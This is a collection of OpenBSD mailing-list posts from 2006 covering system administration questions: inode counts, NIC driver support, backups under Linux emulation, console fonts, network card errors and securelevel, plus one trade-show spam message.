Re: Missing patch and security announce
it's a minor issue. On 1/25/06, Rob W [EMAIL PROTECTED] wrote: See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ? _ Opret en personlig blog og del dine billeder pe MSN Spaces: http://spaces.msn.com/
Re: Marvell Yukon 88E8053 PCI-E Gigabit
Am Mittwoch, 25. Januar 2006 16:20 schrieb Adam Dennis: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see.
view available inodes on partition
Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, -Matt-
Re: Missing patch and security announce
This wasn't meant as a Troll - I just want to understand why there isn't a patch available for this. Moreover why there haven't been made a security announce. (I thought that something went wrong with my first message) From: eric [EMAIL PROTECTED] To: Rob W [EMAIL PROTECTED] CC: misc@openbsd.org Subject: Re: Missing patch and security announce Date: Wed, 25 Jan 2006 11:03:21 -0600 On Wed, 2006-01-25 at 16:06:55 +0100, Rob W proclaimed... See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ? Troll, It's usually best to just troll once and wait for a reply.
Re: Marvell Yukon 88E8053 PCI-E Gigabit
On Wed, 25 Jan 2006, Christoph Fritz wrote: Am Mittwoch, 25. Januar 2006 16:20 schrieb Adam Dennis: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see. SysKonnect support has gone down hill ever since Marvel bought them. I tried unsuccessfully to get h/w and doc supplied to OBSD devs a little over a year ago, then all of the sudden my old SK contact quit replying. diana
Re: view available inodes on partition
Hello! On Wed, Jan 25, 2006 at 03:04:05PM -0500, Matthew Closson wrote: Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, Just read the manual of df. And then look at the option -i. Kind regards, Hannah.
Re: view available inodes on partition
On Wednesday 25 January 2006 20:04, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, -Matt- df -i --STeve Andre'
Re: view available inodes on partition
On 2006/01/25 15:04, Matthew Closson wrote: Is there a way to view how many inodes are still available on a partition. df(1).
Re: view available inodes on partition
On Wed, Jan 25, 2006 at 03:04:05PM -0500, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, rtfm df(1) cu -- paranoic mickey (my employers have changed but, the name has remained)
Re: view available inodes on partition
On 1/25/06, Matthew Closson [EMAIL PROTECTED] wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, man 1 df
Re: view available inodes on partition
Thanks for all the replies, that obviously worked fine. On Wed, 25 Jan 2006, Otto Moerbeek wrote: On Wed, 25 Jan 2006, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. df -i -Otto
Re: view available inodes on partition
On Wed, 25 Jan 2006, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. df -i -Otto
std. paths for IMAP folders
Hi! I guess I can configure things to be anyway I want it, but I would like to ask you guys what would be the most common place where users' IMAP folders are to be stored. If all the incomping mail goes to in /var/mail something, is this also the place that would be the best place to let them (us) have their (our) folders? Or perhaps the home directories? TIA, and best regards, /Joakim -- http://www.df.lth.se/~jokke/
Backups under linux emulation
Dear misc: I'm attempting to use (EMC) Legato Networker to backup one of my OpenBSD boxes. Since there's no OpenBSD binary, and Networker isn't open source, I'm using the Linux binary uner Linux emulation. The binary executes fine, and the OpenBSD box and Legato server are communicating perfectly. Backups work, but with one major problem: Legato backs up files by crawling the file system, starting at / going into each directory and backing up files as it finds them. The problem that I'm having is that, under linux emulation, the emulator first checks to see if a file/directory exists under /emul/linux. So, when the backup software tries to back up /var, it ends up backing up /emul/linux/var, and my actual /var never gets backed up. I have the same problem in /usr, and so on. Is there some method/way around this problem? How can I make my Linux binary back up the actual /var rather than /emul/linux/var? Thanks for the help. Michael
Re: Marvell Yukon 88E8053 PCI-E Gigabit
Am Mittwoch, 25. Januar 2006 20:09 schrieb Diana Eichert: On Wed, 25 Jan 2006, Christoph Fritz wrote: Am Mittwoch, 25. Januar 2006 16:20 schrieb Adam Dennis: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see. SysKonnect support has gone down hill ever since Marvel bought them. I tried unsuccessfully to get h/w and doc supplied to OBSD devs a little over a year ago, then all of the sudden my old SK contact quit replying. I wrote to [EMAIL PROTECTED] and got a working driver (source-code) from [EMAIL PROTECTED] for my current Linux 2.6.15 Maybe the linux source is all docu they give out?
Re: SSH publickey authentication - identity logging
From: steven mestdagh [mailto:[EMAIL PROTECTED] On Tue, Jan 24, 2006 at 11:04:33AM -0700, Spruell, Darren-Perot wrote: Would be useful to have information logged for the connection identifying the key used to authenticate, by the key comment if possible. Does sshd already have this capability? Would anyone consider this a useful feature addition? Have you tried LogLevel VERBOSE in sshd_config(5)? That prints lines like 'Found matching DSA key: fingerprint in the log file. Hadn't tried that, but it gives us enough of what we want to work. Thanks for the tip. DS
Re: Marvell Yukon 88E8053 PCI-E Gigabit
On Wednesday, January 25, Christoph Fritz wrote: Maybe the linux source is all docu they give out? Linux source is *not* documentation. --Toby.
Re: Backups under linux emulation
On Wed, 25 Jan 2006, Michael Favinsky wrote: Dear misc: I'm attempting to use (EMC) Legato Networker to backup one of my OpenBSD boxes. Since there's no OpenBSD binary, and Networker isn't open source, I'm There is an openbsd client. We're using it (nwclient-6.0.2-openbsd-i386.tgz). I'm going to ask around to find out how we got it. Apparently it's not supported but works fine. -rick using the Linux binary uner Linux emulation. The binary executes fine, and the OpenBSD box and Legato server are communicating perfectly. Backups work, but with one major problem: Legato backs up files by crawling the file system, starting at / going into each directory and backing up files as it finds them. The problem that I'm having is that, under linux emulation, the emulator first checks to see if a file/directory exists under /emul/linux. So, when the backup software tries to back up /var, it ends up backing up /emul/linux/var, and my actual /var never gets backed up. I have the same problem in /usr, and so on. Is there some method/way around this problem? How can I make my Linux binary back up the actual /var rather than /emul/linux/var? Thanks for the help. Michael
Re: Backups under linux emulation
Rick, this is good news. If you can provide me some more info on where you got it I'd be grateful. One thing you should be aware of: 6.0.2 has known vulnerabilities, per http://www.securityfocus.com/bid/14582. I suppose that's the price paid when running older unsuppoted software. I'd be a bit concerned about installing exploitable 6.0.2 on one of my servers. -Original Message- From: Rick Aliwalas [mailto:[EMAIL PROTECTED] Sent: Wednesday, January 25, 2006 1:25 PM To: Michael Favinsky Cc: misc@openbsd.org Subject: Re: Backups under linux emulation On Wed, 25 Jan 2006, Michael Favinsky wrote: Dear misc: I'm attempting to use (EMC) Legato Networker to backup one of my OpenBSD boxes. Since there's no OpenBSD binary, and Networker isn't open source, I'm There is an openbsd client. We're using it (nwclient-6.0.2-openbsd-i386.tgz). I'm going to ask around to find out how we got it. Apparently it's not supported but works fine. -rick using the Linux binary uner Linux emulation. The binary executes fine, and the OpenBSD box and Legato server are communicating perfectly. Backups work, but with one major problem: Legato backs up files by crawling the file system, starting at / going into each directory and backing up files as it finds them. The problem that I'm having is that, under linux emulation, the emulator first checks to see if a file/directory exists under /emul/linux. So, when the backup software tries to back up /var, it ends up backing up /emul/linux/var, and my actual /var never gets backed up. I have the same problem in /usr, and so on. Is there some method/way around this problem? How can I make my Linux binary back up the actual /var rather than /emul/linux/var? Thanks for the help. Michael
Re: std. paths for IMAP folders
On Wed, 25 Jan 2006 21:04:43 +0100, Joakim Roubert wrote: Or perhaps the home directories? Yes, $HOME/something (e.g. $HOME/MAIL/inbox ) is a fine place for incoming mail (and other mboxes/maildirs). Regards, tkniaz
Independent Dealers Unite
http://www.itexshow.com/attend_home.asp Register Now! https://secure.ud.net/guesttrackeronline/itex2006/ The Largest and Fastest Growing Event for the Digital Copier//Printer Document Technology Industry www.itexshow.com http://www.itexshow.com/attend_home.asp Las Vegas Convention Center, Las Vegas Nevada, March 14-17, 2006 Put your company in the right position to leverage the lucrative multi-billion dollar Digital/Copier Printer Document Solutions market. ITEX has guided thousands of industry professionals toward a clearer picture of the changing document and workflow landscape. ITEX wants to give you the opportunity to register early for the 2006 event. Registering early guarantees you a seat in the Power Hour workshops of your choice. Seating is limited so be sure to register today! ITEX, now in its sixth year, is a vendor-neutral breeding ground for top Digital/Copier Printer Dealers, Imaging Dealers, VARs, System Integrators and Resellers. Each year, the best of the best convene at ITEX to see the latest technology. You will learn how to take advantage of the seemingly endless document and workflow solutions market offered by the industrys elite. This year at ITEXClick on any of the links to learn more Over 220 vendors http://www.itexshow.com/exhibitlist.asp Over 120 hours of Education http://www.itexshow.com/powerhours Over 125,000 square feet of exhibit space http://www.itexshow.com/floorplan Concurrent Events at ITEX http://www.itexshow.com/attend_concevents.asp 2 separate full-day solutions forums http://www.itexshow.com/attend_dbfselect.asp Compelling Keynote Event http://www.itexshow.com/attend_keynote06.asp Travel Discounts http://www.itexshow.com/atravel Find out what 2,700 industry professionals found out last year. ITEX is the most important event any Document Solution Provider can attend. Las Vegas Convention Center, Las Vegas Nevada SHOW FLOOR OPEN March 15-16, 2006 ITEX POWER HOURS (Hour Seminars) March 15-16, 2006 DEALER BUSINESS FORUMS (All-Day Seminars)March 14 17, 2006 [www.itexshow.com] http://www.itexshow.com 2006 Sponsors DealerSiteBuilder.com http://www.itexshow.com/profile.asp?ID=893 Digital Gateway http://www.itexshow.com/profile.asp?ID=456 eBay Business http://www.itexshow.com/profile.asp?ID=947 EFI Mobile Workforce Automation http://www.itexshow.com/profile.asp?ID=765 GE Commercial Finance http://www.itexshow.com/profile.asp?ID=942 Katun Corporation http://www.itexshow.com/profile.asp?ID=484 LaCrosse Management Systems, Inc. http://www.itexshow.com/profile.asp?ID=485 Laser Imaging International http://www.itexshow.com/profile.asp?ID=486 MKG Imaging Solutions Inc. http://www.itexshow.com/profile.asp?ID=787 Oki Data http://www.itexshow.com/profile.asp?ID=503 Panasonic http://www.itexshow.com/profile.asp?ID=960 PARTS NOW! http://www.itexshow.com/profile.asp?ID=507 PrintFleet Inc. http://www.itexshow.com/profile.asp?ID=496 Q-Imaging USA Inc. http://www.itexshow.com/profile.asp?ID=518 Sharp Electronics Corporation http://www.itexshow.com/profile.asp?ID=997 StructuredWeb http://www.itexshow.com/profile.asp?ID=905 Tech Data Corporation http://www.itexshow.com/profile.asp?ID=780 TSC Imaging http://www.itexshow.com/profile.asp?ID=796 Xerox North American Dealer Channel http://www.itexshow.com/profile.asp?ID=648 Click Below to Remove unsubscribe me http://216.122.144.75/Remove20.asp?tbl=imp_WCCopyMachineLID=66EID=868 0SUPID=28[EMAIL PROTECTED] .
console font size
How does one control appearance of console/fonts on the screen? On one laptop, letters are quite large and console fills entire screen, on another, letters are tiny and the console fills a fraction of the screen. Many thanks! -Igor Generic 3:8
Re: console font size
On Wed, Jan 25, 2006 at 05:45:52PM -0600, Igor Vilensky wrote: How does one control appearance of console/fonts on the screen? On one laptop, letters are quite large and console fills entire screen, on another, letters are tiny and the console fills a fraction of the screen. Check out the man pages for: wsconscfg, wsconsctl, wsfontload Mike
Re: Marvell Yukon 88E8053 PCI-E Gigabit
isn't the openbsd driver derived from the freebsd if_sk? Christoph Fritz [EMAIL PROTECTED] wrote: Am Mittwoch, 25. Januar 2006 16:20 schrieb Adam Dennis: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see. -- Don Rumsfeld has been chewing on my ankles. -- Dick Cheney
le1: underflow and le1: transmitter disabled errors
Hello- We have OpenBSD 3.5 running as a filtering bridge on our network using two Allied Telesyn AT-2971SX cards. The traffic across the bridge is about 150 Mb/s on average. We are experiencing the following errors in our log files: Jan 25 17:01:03 xxx /bsd: le1: underflow Jan 25 17:01:03 xxx /bsd: le1: transmitter disabled Jan 25 17:01:05 xxx last message repeated 5 times Jan 25 17:01:05 xxx /bsd: le2: transmitter disabled Jan 25 17:01:05 xxx /bsd: le1: transmitter disabled Jan 25 17:01:16 xxx /bsd: le1: underflow Jan 25 17:01:16 xxx /bsd: le1: underflow Jan 25 17:01:17 xxx /bsd: le1: transmitter disabled As you can see these errors are coming very fast. Any information would help. Thank you, Davin Flatten Boot Log: --- Jan 25 08:41:34 xxx /bsd: OpenBSD 3.5 (GENERIC) #34: Mon Mar 29 12:24:55 MST 2004 Jan 25 08:41:34 xxx /bsd: [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC Jan 25 08:41:34 xxx /bsd: cpu0: Intel(R) Pentium(R) III CPU - S 1400MHz (GenuineIntel 686-class) 1.40 GHz Jan 25 08:41:34 xxx /bsd: cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR,SSE Jan 25 08:41:34 xxx /bsd: real mem = 267960320 (261680K) Jan 25 08:41:34 xxx /bsd: avail mem = 242130944 (236456K) Jan 25 08:41:34 xxx /bsd: using 3296 buffers containing 13500416 bytes (13184K) of memory Jan 25 08:41:35 xxx /bsd: mainbus0 (root) Jan 25 08:41:35 xxx /bsd: bios0 at mainbus0: AT/286+(00) BIOS, date 05/01/03, BIOS32 rev. 0 @ 0xffe90 Jan 25 08:41:35 xxx /bsd: pcibios0 at bios0: rev. 2.1 @ 0xf/0x1 Jan 25 08:41:35 xxx /bsd: pcibios0: PCI IRQ Routing Table rev. 1.0 @ 0xfc220/176 (9 entries) Jan 25 08:41:35 xxx /bsd: pcibios0: no compatible PCI ICU found: ICU vendor 0x1166 product 0x0201 Jan 25 08:41:35 xxx /bsd: pcibios0: Warning, unable to fix up PCI interrupt routing Jan 25 08:41:35 xxx /bsd: pcibios0: PCI bus #0 is the last bus Jan 25 08:41:35 xxx /bsd: bios0: ROM list: 0xc/0x8000 0xc8000/0x1000 0xc9000/0x4000! 0xec000/0x4000! Jan 25 08:41:35 xxx /bsd: pci0 at mainbus0 bus 0: configuration mode 1 (no bios) Jan 25 08:41:35 xxx /bsd: pchb0 at pci0 dev 0 function 0 ServerWorks CNB20HE Host rev 0x23 Jan 25 08:41:35 xxx /bsd: pci1 at pchb0 bus 1 Jan 25 08:41:35 xxx /bsd: em0 at pci1 dev 2 function 0 Intel PRO/1000XT (PWLA8490XT) rev 0x02: irq 7, address: 00:06:5b:8b:31:dc Jan 25 08:41:35 xxx /bsd: em1 at pci1 dev 4 function 0 Intel PRO/1000XT (PWLA8490XT) rev 0x02: irq 5, address: 00:06:5b:8b:31:dd Jan 25 08:41:35 xxx /bsd: ppb0 at pci1 dev 8 function 0 vendor Intel, unknown product 0x309 rev 0x01 Jan 25 08:41:35 xxx /bsd: pci2 at ppb0 bus 2 Jan 25 08:41:35 xxx /bsd: Adaptec AIC-7899F rev 0x01 at pci2 dev 6 function 0 not configured Jan 25 08:41:35 xxx /bsd: Adaptec AIC-7899F rev 0x01 at pci2 dev 6 function 1 not configured Jan 25 08:41:35 xxx /bsd: aac0 at pci1 dev 8 function 1 Dell PERC 3/Di rev 0x01: irq 3 Jan 25 08:41:35 xxx /bsd: aac0: i960RX 100MHz, 128MB, optional battery present (3) Kernel 2.7-1 Jan 25 08:41:35 xxx /bsd: scsibus0 at aac0: 64 targets Jan 25 08:41:35 xxx /bsd: sd0 at scsibus0 targ 0 lun 0: Adaptec, Container #00, SCSI2 0/direct fixed Jan 25 08:41:35 xxx /bsd: sd0: 17351MB, 2212 cyl, 255 head, 63 sec, 512 bytes/sec, 35535780 sec total Jan 25 08:41:36 xxx /bsd: pchb1 at pci0 dev 0 function 1 ServerWorks CNB20HE Host rev 0x01 Jan 25 08:41:36 xxx /bsd: pchb2 at pci0 dev 0 function 2 ServerWorks I/O Bridge rev 0x01 Jan 25 08:41:36 xxx /bsd: pchb3 at pci0 dev 0 function 3 ServerWorks I/O Bridge rev 0x01 Jan 25 08:41:36 xxx /bsd: pci3 at pchb3 bus 3 Jan 25 08:41:36 xxx /bsd: le1 at pci3 dev 8 function 0 AMD 79c970 PCnet-PCI rev 0x36: irq 5 Jan 25 08:41:36 xxx /bsd: le1: address 00:30:84:6f:ea:79 Jan 25 08:41:36 xxx /bsd: le1: 8 receive buffers, 2 transmit buffers Jan 25 08:41:36 xxx /bsd: le2 at pci3 dev 10 function 0 AMD 79c970 PCnet-PCI rev 0x36: irq 3 Jan 25 08:41:36 xxx /bsd: le2: address 00:30:84:71:33:12 Jan 25 08:41:36 xxx /bsd: le2: 8 receive buffers, 2 transmit buffers Jan 25 08:41:36 xxx /bsd: vga1 at pci0 dev 12 function 0 ATI Rage XL rev 0x27 Jan 25 08:41:36 xxx /bsd: wsdisplay0 at vga1: console (80x25, vt100 emulation) Jan 25 08:41:36 xxx /bsd: wsdisplay0: screen 1-5 added (80x25, vt100 emulation) Jan 25 08:41:36 xxx /bsd: pchb4 at pci0 dev 15 function 0 ServerWorks CSB5 SouthBridge rev 0x93 Jan 25 08:41:36 xxx /bsd: pciide0 at pci0 dev 15 function 1 ServerWorks CSB5 IDE rev 0x93: DMA Jan 25 08:41:36 xxx /bsd: atapiscsi0 at pciide0 channel 0 drive 0 Jan 25 08:41:36 xxx /bsd: scsibus1 at atapiscsi0: 2 targets Jan 25 08:41:36 xxx /bsd: cd0 at scsibus1 targ 0 lun 0: SAMSUNG, CD-ROM SN-124, N102 SCSI0 5/cdrom removable Jan 25 08:41:36 xxx /bsd: cd0(pciide0:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 2 Jan 25 08:41:36 xxx /bsd: ohci0 at pci0 dev 15 function 2 ServerWorks OSB4/CSB5 USB rev 0x05: irq 11, version 1.0,
make build | securelevel=2
3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Can I also compile ports with securelevel set to 2? Does someone know of a port where I must decrease the securelevel? Usually I install at least nano, tcsh, and kermit. Darrel
Re: make build | securelevel=2
3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Did you have a problem with 3.9-beta that you want to report? Otherwise who knows, you'll probably have the same problem with 3.9-stable a few months from now... and then?
Re: make build | securelevel=2
On 1/25/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: 3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Can I also compile ports with securelevel set to 2? Does someone know of a port where I must decrease the securelevel? Usually I install at least nano, tcsh, and kermit. you can do everything except make release. which means you should ask why you even bother with securelevel 2. if you don't know what it does, don't fiddle with it.
Re: std. paths for IMAP folders
On 25/01/06 22:06, Tomasz Kniaz wrote: Yes, $HOME/something (e.g. $HOME/MAIL/inbox ) is a fine place for incoming mail (and other mboxes/maildirs). Excellent, thanks a lot! Regards, /Joakim -- http://www.df.lth.se/~jokke/
Re: make build | securelevel=2
On Thursday, January 26, 2006, at 00:53AM, Ted Unangst [EMAIL PROTECTED] wrote: On 1/25/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: 3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Can I also compile ports with securelevel set to 2? Does someone know of a port where I must decrease the securelevel? Usually I install at least nano, tcsh, and kermit. you can do everything except make release. which means you should ask why you even bother with securelevel 2. if you don't know what it does, don't fiddle with it. I am *learning* what it does. :) I am planning on make release for tomorrow. Things are great- thanks. Darrel
Re: make build | securelevel=2
On Thursday, January 26, 2006, at 00:20AM, Peter Valchev [EMAIL PROTECTED] wrote: 3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Did you have a problem with 3.9-beta that you want to report? Otherwise who knows, you'll probably have the same problem with 3.9-stable a few months from now... and then? Good point, thanks. I am still troubleshooting and have not thoroughly prepared the information, though. At home, cvs downloads are halting and will time out, but it could be that something changed at my ISP. At work, 3.9 did not find the 'startx' command and /usr/libexec/locate.updatedb failed, too. However, this is on known bad hardware that can actually serve DNS and time. I will update if something potentially interesting happens. Darrel